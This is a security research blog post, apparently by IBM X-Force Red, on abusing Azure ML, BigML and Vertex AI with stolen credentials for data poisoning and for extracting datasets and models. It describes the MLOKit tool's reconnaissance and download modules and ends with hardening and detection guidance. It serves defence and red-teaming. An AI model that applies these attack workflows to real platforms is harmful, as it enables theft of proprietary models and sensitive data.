For full details on this research, see the X-Force Red whitepaper “Disrupting the Model: Abusing MLOps Platforms to Compromise ML Models and Enterprise Data Lakes”.
Machine learning operations (MLOps) platforms are used by enterprises of all sizes to develop, train, deploy and monitor large language models (LLMs) and other foundation models (FMs), as well as the generative AI (gen AI) applications built on top of these models. The rush to leverage AI throughout enterprises has meant that security has been often overlooked in the name of progress, resulting in weak controls and direct access to sensitive data lakes and crown jewel data for retrieval augmented generation (RAG) use. Similar to attacks targeting development operations (DevOps), if an attacker can gain unauthorized access to these MLOps platforms, there could be a significant impact through a variety of attacks that affect the confidentiality, integrity and availability of the machine learning (ML) models and the data they provide. Threat actors are likely motivated to abuse these gaps and are pursuing early research and private toolkits to attack MLOps platforms, steal both the valuable FMs/LLMs and weights, poison LLMs used for computer vision and military use and compromise the sensitive enterprise datasets connected to AI-integrated applications.
This research includes a background on MLOps platforms and the machine learning security operations (MLSecOps) lifecycle, along with detailing ways to abuse some of the most popular cloud-based and internally hosted platforms used by enterprises such as BigML, Azure Machine Learning and Google Cloud Vertex AI. These attack scenarios will include data poisoning, data extraction and model extraction. Additionally, there is a public release of open-source tooling to perform and facilitate these attacks, along with defensive guidance for protecting these MLOps platforms.
Key findings
- The use of MLOps platforms by enterprises will continue to grow. Due to this, attackers will view these platforms as prime targets to attack.
- It is critical to simulate attacks against MLOps platforms and build detections for those attacks. There is currently a lack of public detection rules to detect the misuse of these MLOps platforms.
- Securing MLOps platforms and personnel such as data scientists and AI/ML engineers is becoming more important as the use of AI continues to grow.
Background
Prior work
The below resources are prior work related to the content of this research. The relevant prior work will be summarized, and the ways in which this X-Force Red research differs from or builds upon it will be outlined.
BigML model extraction attack
There is an academic whitepaper titled Stealing Machine Learning Models via Prediction, that includes model extraction attacks against BigML from a black-box approach by an attacker that can query an ML model to obtain predictions or input feature vectors of a published ML model. This X-Force Red research includes a different variation of this attack on how an attacker who has compromised user access credentials (e.g., API key) for BigML can perform model extraction from a white-box approach.
Code execution within training and operations environments
Adrian Wood and Mary Walker published research at Black Hat Asia 2024 that covers modifying models in open-source repositories such as HuggingFace to facilitate code execution when those models are used in training and operations environments. This X-Force Red research only covers an overview of this type of code execution attack via model modification and instead focuses on extracting sensitive data from models and enterprise data lakes and poisoning training data within cloud-based and internally hosted MLOps platforms used by enterprises. Additionally, this research is directly targeting MLSecOps and includes the release of open-source tooling to target MLOps platforms.
Obtaining credentials from Azure Machine Learning resources
Nitesh Surana published a Trend Micro blog post that detailed a vulnerability (CVE-2023-23382) they discovered regarding credentials being logged in cleartext within some Azure Machine Learning workspace resources, such as Azure file shares and storage blobs. Nitesh also presented that research at Black Hat USA 2023. This X-Force Red research does not cover or include the attack from Nitesh’s research. Instead, when focusing on attacking Azure Machine Learning, this research focuses on conducting training data poisoning, training data extraction and model extraction attacks through compromised user access in the Azure Machine Learning web interface, Azure CLI, REST API and utilizing a custom toolkit.
Threat actor motivations
Threat actors are becoming more motivated to attack and compromise MLOps platforms, due to their criticality in today’s world. In 2024, the first known in-the-wild attack against an AI framework was discovered. Below is a listing of high-level motivations for threat actors.
- Cost reduction – By stealing training and model data, an attacker will reduce the cost of needing to develop a model, since the training of a model can be costly.
- Sensitive data – For models utilizing private training datasets, the data contained can be sensitive such as personally identifiable information (PII) and protected health information (PHI). RAG data can also be a sensitive asset an attacker could target.
- Data extortion – Since these private models and datasets are sensitive, an attacker could target them as part of a ransomware or data extortion attack and threaten to release the data unless a ransom is paid.
- Denial of service – If an attacker wants to be destructive and degrade a service that is utilizing an ML model in the backend, an attacker could poison or backdoor the model to degrade the reliability and accuracy of the model.
What is MLOps?
Machine learning operations (MLOps) is the practice of deploying and maintaining ML models in a secure, efficient and reliable way. The goal of MLOps is to provide a consistent and automated process to be able to rapidly get an ML model into production for use by ML technologies. MLOps exists at the intersection of machine learning, DevOps and data engineering, as shown in the diagram below.
Figure 1: Diagram showing the intersection for MLOps
An MLOps lifecycle exists for an ML model to go from design all the way to deployment.
MLOps lifecycle
The five primary phases involved in the MLOps lifecycle include design, develop/build, test, deploy and manage.
Figure 2: MLOps lifecycle
Design
This phase involves collecting, sanitizing and organizing data so that it can be used in an efficient manner for training a model. This is the most critical phase of the MLOps lifecycle, as the quality of the model completely depends on the quality of data being input.
Develop/Build
The next phase includes training ML models based on the data from the design phase. This includes selecting a framework to be used for the training and optimizing the performance of the model.
Test
After a model has been built, testing needs to occur to ensure the trust, quality and performance of the model is sufficient. Additionally, during this phase constant evaluation of the model will be performed. The purpose of evaluating a model is to test the accuracy of its output. For example, being able to answer the question “Is this model accomplishing the goal that was set forth for it?”
Deploy
After a model has been sufficiently trained, evaluated and tested, it is time for it to be deployed to production. During this phase, requirements are gathered for the computing power needed to run the model in an efficient manner. Additionally, the method of deployment and usage of the model in production is determined. For example, deploying the model as a REST API for usage.
Manage
Once a model is deployed in production, it must be monitored to ensure that it is reliable and that the infrastructure it is being run on is in a healthy state. During this phase, there are constant metrics being collected and analyzed whether the model is performing in an accurate and responsive manner. As the model continues to be used, there may come a point where the data it is providing is outdated, or business requirements have changed. This causes the potential for retiring a deployed model so that a new model can be trained and deployed in its place. If this is the case, then you start the MLOps lifecycle over in the “Design” phase.
Popular MLOps platforms
All the previous phases discussed can be conducted within an MLOps platform. MLOps platforms allow a single place to conduct all phases of the MLOps lifecycle. There are several well-known MLOps platforms that exist, which are used by enterprises of all sizes. Some of the most popular MLOps platforms are listed below:
Attack scenarios against MLOps lifecycle
There are several well-known attacks that can be performed against the MLOps lifecycle to affect the confidentiality, integrity and availability of ML models and associated data. However, performing these attacks against an MLOps platform using stolen credentials has not been covered in public security research. An example attack path is shown below where an attacker could gain the privileges required to perform a model extraction attack against an MLOps platform.
Figure 3: Example of MLOps-focused attack path
This X-Force Red research focuses on attacks against MLOps platforms after an attacker has obtained valid credential material, and how to detect these attacks. Common methods for obtaining the credential material required to access MLOps platforms include but are not limited to file shares, intranet sites, user workstations, social engineering or other unprotected/misconfigured internal network resources.
Figure 4: Diagram showing research focus
In the whitepaper associated with this blog post, it is demonstrated how to perform several attacks such as data poisoning, data extraction and model extraction in some of the most popular MLOps platforms.
Data poisoning
This attack involves an attacker having access to the raw data being used in the “Design” phase of the MLOps lifecycle to include attacker-provided data or being able to directly modify a training dataset. The goal of a data poisoning attack is to be able to influence the data that is being trained in an ML model and eventually deployed to production.
Figure 5: Data poisoning diagram
Data extraction
In this attack, an attacker will extract the training data being used as part of the MLOps lifecycle. This data could be used by an attacker to train their own model or to gain deeper insight into how the model is being trained for future attacks. Additionally, an attacker may be able to extract sensitive data from this training data depending on the classification of data being used to train the model, such as PII, PHI or even sensitive credentials if this model is being used as a coding assistant.
Figure 6: Diagram showing data extraction attack
Model extraction
Model extraction attacks involve the ability of an attacker to steal a trained ML model that is deployed in production. An attacker could use a stolen model to extract sensitive training data such as the training weights used, or to use the predictive capabilities used in the model for their own financial gain. For example, an attacker could use a stolen model that is trained to predict commodity futures for their financial gain.
An attacker has a couple of primary options when performing model extraction. This includes either extracting the model before or after deployment, as shown in the respective diagrams below:
Figure 7: Performing model extraction before deployment
Figure 8: Performing model extraction after deployment
Evasion attacks
Evasion attacks are conducted by an attacker to trick a deployed ML model into avoiding a given classifier. For example, a common evasion attack in the cybersecurity industry is to evade email security spam solutions. These email security solutions are ML models that have been trained on data to determine whether a given email is malicious or not. An example of an evasion attack against these ML models is an attacker attempting to bypass the spam email classifiers that have been determined based on the ML model of the email security product.
Code execution within training and operations environments
Through modification of ML models an attacker can insert code so that when the model is loaded, code is executed. This is highlighted in the below diagrams:
Figure 9: Adding malicious code to a model
Figure 10: Code executes in training and operations environments
This was demonstrated in a recent attack where over 100 models within Hugging Face were modified to include a reverse shell. This is possible because certain ML models support code execution as outlined in this resource. An example of a format that supports code execution is the pickle format, which allows for Python objects to be serialized. If an attacker can gain “modify” access to a model that is in one of these code execution formats, this enables an attacker to gain code execution whenever the victim model is loaded both in training and operations environments.
Attacking MLOps platforms
The following sections will give an overview of how to conduct some of the attacks highlighted in the Attack scenarios against MLOps lifecycle section above in a few of the most popular MLOps platforms such as Azure Machine Learning (Azure ML), BigML and Google Cloud Vertex AI (Vertex AI). For full details, see the whitepaper.
Azure Machine Learning
Azure ML is a popular MLOps platform that contains all the functionality needed to facilitate a full MLOps lifecycle. The main component within an Azure ML Studio is called a workspace. A workspace contains all the ML assets and components involved to be able to develop and deploy an ML model into production.
Figure 11: Components of AML service (https://www.trendmicro.com/vinfo/gb/security/news/cybercrime-and-digital-threats/uncovering-silent-threats-in-azure-machine-learning-service-part-I)
An example attack scenario against Azure ML could start with an attacker performing a device code phishing attack against a Data Scientist. This allows an attacker to obtain an Azure access token as the targeted Data Scientist user.
Figure 12: Device code phishing against a Data Scientist
With an Azure access token, the attacker can access the Azure ML REST API as the compromised Data Scientist user.
Figure 13: Gaining access to Azure ML
After successfully gaining access to the Azure ML REST API, an attacker can exfiltrate any available models from Azure ML. Full details on this process are included in the whitepaper.
Figure 14: Exfiltrating models from Azure ML
BigML
BigML is another MLOps platform that is used by many customers to manage the full MLOps lifecycle of their ML models.
An example attack scenario against BigML could start with an attacker discovering code secrets within a public source code repository that facilitates access to an organization’s BigML instance. For example, discovering an API key for the BigML REST API on GitHub.
Figure 15: Discovering BigML API key
This API key would facilitate initial access to BigML for the target organization.
Figure 16: Obtaining access to BigML REST API
After obtaining initial access to an organization’s BigML instance, an attacker could exfiltrate private datasets using the REST API. Full details on this process are included in the whitepaper.
Figure 17: Exfiltrating datasets from BigML
Google Cloud Vertex AI
Google Cloud has an MLOps platform named Vertex AI, which contains all the components needed to facilitate the MLOps lifecycle.
An example attack scenario against Vertex AI could start with an attacker performing a phishing attack where a user executes a Cobalt Strike beacon. From there, the attacker uses Active Directory to escalate their privileges in the environment.
Figure 18: Gaining initial access and escalating privileges
With elevated privileges to an environment, an attacker could then perform lateral movement to an ML engineer’s workstation. Since the ML engineer uses the GCloud CLI to access GCloud resources in this case, the attacker can dump the GCloud access tokens from the user’s workstation.
Figure 19: Performing lateral movement to ML Engineer workstation
The attacker is able to access Vertex AI using the stolen access token and exfiltrate any models the compromised ML engineer has access to. Full details on this process are included in the whitepaper.
Figure 20: Exfiltrating model from Vertex AI
MLOKit
Background
X-Force Red analysts wanted to take advantage of the REST API functionality in the MLOps platforms covered in this research and add the most useful functionality in a tool called MLOKit. The goal of this tool is to provide awareness of the potential abuse of MLOps platforms and to facilitate the detection of attack techniques against MLOps platforms. This tool can enable both offensive and defensive security practitioners to simulate attacks against the supported MLOps platforms (Azure ML, BigML and Vertex AI) to increase the security posture of their environment and configurations of these platforms. MLOKit was built in a modular approach so that new MLOps platforms and modules can be added in the future by the information security community. The tool and full documentation are available on the X-Force Red GitHub. Example use cases will be shown in the next sections.
Reconnaissance
Below are some useful reconnaissance modules available within MLOKit. For full documentation, see the MLOKit GitHub repository.
Check access credentials
After you have initially obtained credentials to an MLOps platform, you will want to validate those credentials using the check module. In this case, we are validating credentials to Azure ML.
Example output is shown below where we validate access to Azure ML with a stolen access token.
Figure 21: Using the check module against Azure ML
List projects/workspaces
After access has been validated to an MLOps platform, you will want to start listing the projects (workspaces in Azure ML) that you have access to by using the list-projects module. In this example, we are listing the available projects in Vertex AI.
Example output is shown below, which includes all the projects we have access to with the stolen credentials for Vertex AI.
Figure 22: Using the list-projects module against Vertex AI
List datasets
After listing the available projects or workspaces, you will want to list the datasets or models included in those projects. In this example, we are listing all the available datasets within BigML.
In the example output below, MLOKit lists the available datasets, along with details such as the dataset ID and more.
Figure 23: Using list-datasets module against BigML
List models
You will also want to perform model reconnaissance to see what models you have access to with a compromised credential. In this example, we are listing all the available models within the “coral-marker-414313” project in Vertex AI.
The output will include the available models, which include attributes such as name, model ID, and much more.
Figure 24: Using list-models module against Vertex AI
Training data extraction
Now that you have validated access to an MLOps platform and have performed reconnaissance on the available datasets, you will want to steal the available training datasets using the download-dataset module. We will be downloading a dataset from the BigML MLOps platform in this example.
This will download the dataset to your current working directory with the file name MLOKit-[random 8 characters].
Figure 25: Using the download-dataset module against BigML
Model extraction
Previously, we listed the available models in Vertex AI. Now we will download a model in Vertex AI by using the download-model module.
This will download all correlating model files to your current working directory. First, it will export the model to a Google Cloud storage location that you have access to with your compromised credentials.
Figure 26: Using download-model module against BigML
Then it will download all the files from that location.
Figure 27: Downloading model files
The directory structure is maintained for the downloaded files to mimic the exported folder in Google Cloud storage.
Figure 28: Showing downloaded files
Defensive considerations and guidance
X-Force Red has several defensive considerations for the MLOps platforms covered in this research related to configuration best practices and guidance on detection rule creation for the attack scenarios shown. Full details are included in the whitepaper.
MLOps platforms – Configuration guidance
Below is a summary of configuration guidance for the MLOps platforms covered in this research.
Azure ML
Microsoft has a guide on security best practices for securing your Azure ML instance. This includes security best practices for restricting access to resources and operations, restricting network communications, encrypting data in transit and at rest, scanning container registries for vulnerabilities and applying the Azure policy governance tool. Microsoft also provides a security baseline for the Azure ML service here.
Another great resource for securing your Azure ML instance is here. Below is a summary of the guidance:
- Collect and manage inventory of ML assets, which include models, workspaces, pipelines, endpoints and datasets. Understand if there are any third-party dependencies for these assets.
- Have personnel participate in training to learn about security risks and vulnerabilities associated with ML.
- Include ML solutions in threat modeling exercises.
- Perform best practices on data used throughout Azure ML, such as adopting best practices for identity and access management and data encryption.
- Implement security best practices for ML workflows, such as network isolation, role-based access, securing secrets and performing auditing and monitoring of ML assets.
- Build detections for the below scenarios:
- Exfiltration of training datasets
- Unauthorized access to training data
- Identification of model performance impacts
- Vulnerabilities in software components involved with ML workflow
- Unusual or abnormal requests being conducted against a published model
BigML
Below are configuration recommendations for BigML:
- Enable MFA
- Rotate credentials frequently, which includes API keys as well. API keys have no expiration date.
- Additionally, it is recommended to apply granular access controls for users who can access and interact with various resources, such as projects and organizations. This is possible via alternative keys in BigML to apply fine-grained access to REST API resources.
Vertex AI
There is a great resource available here, which outlines best practices for securing your Vertex AI instance. This includes the below-summarized guidance:
- Apply the principle of least privilege for user access and ensure users can only access components that align with their roles
- Apply the principle of least privilege for service accounts, and ensure they only have access to a specific Vertex AI workbench pipeline
- Use IAM User Management to manage user roles and group memberships
- Disable External IP addresses within Vertex AI
- Enable Virtual Private Cloud (VPC) service controls
- Enable Data Access audit logs, so that you can log and build alerts for anomalous activity
Additionally, consider implementing Security Command Center protection for Vertex AI, which allows the ability to enhance the security of your Vertex AI applications.
MLOps platforms – Detection guidance
Detailed detection guidance and rules for the MLOps platforms covered in this research are included in the whitepaper, which includes details on how to detect the below attack scenarios.
- Dataset poisoning
- Dataset reconnaissance
- Model reconnaissance
- Dataset extraction
- Model extraction
Conclusion
Organizations continue to accelerate their adoption and usage of AI to advance their businesses, which has quickly caused ML technologies to become critical to business operations for enterprises of all sizes. The increased usage of MLOps platforms to create, manage and deploy ML models will cause attackers to view these platforms as attractive targets. As such, properly securing these MLOps platforms and understanding how an attacker could abuse them to conduct attacks such as data poisoning, data extraction and model extraction is critical. It is X-Force Red’s goal that this research brings more attention and inspires future research on defending other business-critical MLOps platforms and services.
Acknowledgments
A special thank you to the below people for giving feedback on this research and providing blog post content review:
Adversary Simulation, X-Force Red
Global Head of X-Force Red